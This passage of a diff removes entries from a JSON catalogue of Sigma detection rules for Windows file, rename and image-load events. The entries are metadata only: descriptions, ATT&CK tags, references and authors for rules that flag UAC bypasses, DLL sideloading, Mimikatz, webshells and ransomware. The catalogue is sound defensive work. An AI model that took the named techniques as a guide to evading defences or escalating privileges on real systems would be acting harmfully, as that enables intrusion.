"falsepositive": [ - "Legitimate use of the profile by developers or administrators" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of an file in user Word Startup", - "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "value": "Creation In User Word Startup Folder", - "meta": { - "refs": [ - "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2022/06/05", - "filename": "file_event_win_susp_winword_startup.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Addition of legitimate plugins" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", - "value": "PsExec Service File Creation", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "file_event_win_tool_psexec.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", - "value": "Hijack Legit RDP Session to Move Laterally", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2019/02/21", - "filename": "file_event_win_tsclient_filewrite_startup.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "value": "UAC Bypass Using Consent and Comctl32 - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "file_event_win_uac_bypass_consent_comctl32.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", - "value": "UAC Bypass Using .NET Code Profiler on MMC", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", - "value": "UAC Bypass Using EventVwr", - "meta": { - "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", - "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ], - "creation_date": "2022/04/27", - "filename": "file_event_win_uac_bypass_eventvwr.yml", - "author": "Antonio Cocomazzi (idea), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "value": "UAC Bypass Using IDiagnostic Profile - File", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/IDiagnosticProfileUAC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/07/03", - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "value": "UAC Bypass Using IEInstal - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_ieinstal.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", - "value": "UAC Bypass Using MSConfig Token Modification - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_msconfig_gui.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "value": "UAC Bypass Using NTFS Reparse Point - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "value": "UAC Bypass Abusing Winsat Path Parsing - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_winsat.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", - "value": "UAC Bypass Using Windows Media Player - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "file_event_win_uac_bypass_wmp.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Possible webshell file creation on a static web site", - "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "value": "Windows Webshell Creation", - "meta": { - "refs": [ - "PT ESC rule and personal experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/10/22", - "filename": "file_event_win_webshell_creation_detect.yml", - "author": "Beyu Denis, oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "value": "Creation of an WerFault.exe in Unusual Folder", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" - ], - "creation_date": "2022/05/09", - "filename": "file_event_win_werfault_dll_hijacking.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", - "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "meta": { - "refs": [ - "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/06", - "filename": "file_event_win_winrm_awl_bypass.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "value": "Suspicious Word Cab File Write CVE-2021-40444", - "meta": { - "refs": [ - "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", - "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587" - ], - "creation_date": "2021/09/10", - "filename": "file_event_win_winword_cve_2021_40444.yml", - "author": "Florian Roth, Sittikorn S", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of the default output filename used by the wmicexec tool", - "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "value": "Wmiexec Default Output File", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1047" - ], - "creation_date": "2022/06/02", - "filename": "file_event_win_wmiexec_default_filename.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", - "value": "Wmiprvse Wbemcomn DLL Hijack - File", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/10/12", - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects file writes of WMI script event consumer", - "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", - "value": "WMI Persistence - Script Event Consumer File Write", - "meta": { - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ], - "creation_date": "2018/03/07", - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of template files for Microsoft Office from outside Office", - "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", - "value": "Office Template Creation", - "meta": { - "refs": [ - "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2022/06/02", - "filename": "file_event_win_word_template_creation.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "value": "UEFI Persistence Via Wpbbin - FileCreation", - "meta": { - "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ], - "creation_date": "2022/07/18", - "filename": "file_event_win_wpbbin_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "value": "Writing Local Admin Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1546.002" - ], - "creation_date": "2022/01/01", - "filename": "file_event_win_writing_local_admin_share.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", - "value": "Rename Common File to DLL File", - "meta": { - "refs": [ - "https://twitter.com/ffforward/status/1481672378639912960", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "file_rename_win_not_dll_to_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Application installation" - ], - "logsource.category": "file_rename", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "value": "Suspicious Appended Extension", - "meta": { - "refs": [ - "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", - "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2022/07/16", - "filename": "file_rename_win_ransomware.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Backup software" - ], - "logsource.category": "file_rename", - "logsource.product": "windows" - } - }, - { - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "value": "Abusing Azure Browser SSO", - "meta": { - "refs": [ - "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" - ], - "creation_date": "2020/07/15", - "filename": "image_load_abusing_azure_browser_sso.yml", - "author": "Den Iuzvyk", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", - "value": "Alternate PowerShell Hosts - Image", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "image_load_alternate_powershell_hosts_moduleload.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "value": "Microsoft Defender Loading DLL from Nondefault Path", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "image_load_defender_load_dll_from_nondefault_path.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", - "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "value": "FoggyWeb Backdoor DLL Loading", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587" - ], - "creation_date": "2021/09/27", - "filename": "image_load_foggyweb_nobelium.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", - "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "value": "In-memory PowerShell", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/p3nt4/PowerShdll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" - ], - "tags": [ - "attack.t1059.001", - "attack.execution" - ], - "creation_date": "2019/11/14", - "filename": "image_load_in_memory_powershell.yml", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects certain DLL loads when Mimikatz gets executed", - "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", - "value": "Mimikatz In-Memory", - "meta": { - "refs": [ - "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" - ], - "tags": [ - "attack.s0002", - "attack.t1003", - "attack.lateral_movement", - "attack.credential_access", - "car.2019-04-004" - ], - "creation_date": "2017/03/13", - "filename": "image_load_mimikatz_inmemory_detection.yml", - "author": "sigma", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", - "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "value": "MSDT.exe Loading Diagnostic Library", - "meta": { - "refs": [ - "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" - ], - "creation_date": "2022/06/17", - "filename": "image_load_msdt_sdiageng.yml", - "author": "Greg (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes loading modules related to PCRE.NET package", - "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "value": "PCRE.NET Package Image Load", - "meta": { - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/10/29", - "filename": "image_load_pcre_net_load.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "value": "Pingback Backdoor - Image", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ], - "creation_date": "2021/05/05", - "filename": "image_load_pingback_backdoor.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", - "value": "Rundll32 Loading Renamed Comsvcs DLL", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1555200155351228419", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" - ], - "creation_date": "2022/08/14", - "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", - "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "value": "WMI Script Host Process Image Loaded", - "meta": { - "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2020/09/02", - "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "value": "Antivirus Software DLL Sideloading", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_antivirus.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "value": "DLL Sideloading Of DBGCORE.DLL", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/10/25", - "filename": "image_load_side_load_dbgcore_dll.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", - "value": "DLL Sideloading Of DBGHELP.DLL", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/10/25", - "filename": 